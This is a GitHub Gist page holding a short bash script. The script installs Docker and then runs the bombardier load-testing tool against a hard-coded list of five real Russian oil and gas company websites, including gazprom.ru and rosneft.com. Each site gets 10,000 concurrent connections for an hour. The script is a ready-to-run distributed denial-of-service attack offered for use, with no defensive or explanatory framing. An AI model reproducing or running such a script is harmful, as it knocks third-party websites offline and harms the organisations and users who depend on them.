Created
March 7, 2022 17:37
-
-
Save xpr0ger/db19bb9754db258dd47254c51f90d87c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
yum update -y | |
yum install docker -y | |
systemctl enable docker.service | |
systemctl start docker.service | |
# ============= TARGET WEBSITES ============== | |
cat <<EOF > targets.txt | |
transneft.ru | |
tektorg.ru | |
rosneft.com | |
lukoil.com | |
gazprom.ru | |
EOF | |
# =========== END TARGET WEBSITES ============ | |
for target in $(cat targets.txt) | |
do | |
docker run -d --rm alpine/bombardier -c 10000 -d 1h -l $target | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment